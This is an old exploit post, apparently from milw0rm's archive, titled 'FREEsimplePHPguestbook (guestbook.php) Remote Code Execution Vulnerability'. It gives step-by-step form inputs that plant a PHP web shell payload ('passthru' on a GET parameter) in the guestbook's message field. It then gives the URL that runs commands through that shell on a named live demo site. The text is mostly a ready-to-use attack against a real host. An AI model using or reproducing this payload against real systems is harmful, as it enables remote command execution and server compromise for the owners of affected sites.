28 lines
No EOL
1.3 KiB
Text
28 lines
No EOL
1.3 KiB
Text
_____ ____ __ __ _ ____ ____ ____
|
|
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
|
|
| | | |_) | \ V / / _ \ | | _ | | | |
|
|
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|
|
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
|
|
|
|
FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability
|
|
Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip
|
|
Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php
|
|
Exploit :
|
|
Go http://www.sanusart.com/php/test/guestbook/guestbook.php
|
|
In ->> Name (required): Write ->> Mahmood
|
|
In ->> Web site (without http://): Write ->> http://tryag.cc
|
|
In ->> Message: Write ->> <? passthru($_GET[tryag]); ?>
|
|
|
|
After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id
|
|
|
|
See Pictures : 1- http://up1.mlfnt.net/images/7kzeu9l8hdjynjud062.png
|
|
2- http://up1.mlfnt.net/images/rhcuudvtuzv1i62ovp.png
|
|
|
|
____ _ _ __ __
|
|
/ ___| ___ | | __| | | \/ |
|
|
| | _ / _ \ | | / _` | | |\/| |
|
|
| |_| | | (_) | | |___ | (_| | | | | |
|
|
\____| \___/ |_____| \__,_| _____ |_| |_|
|
|
|_____|
|
|
|
|
# milw0rm.com [2008-11-10] |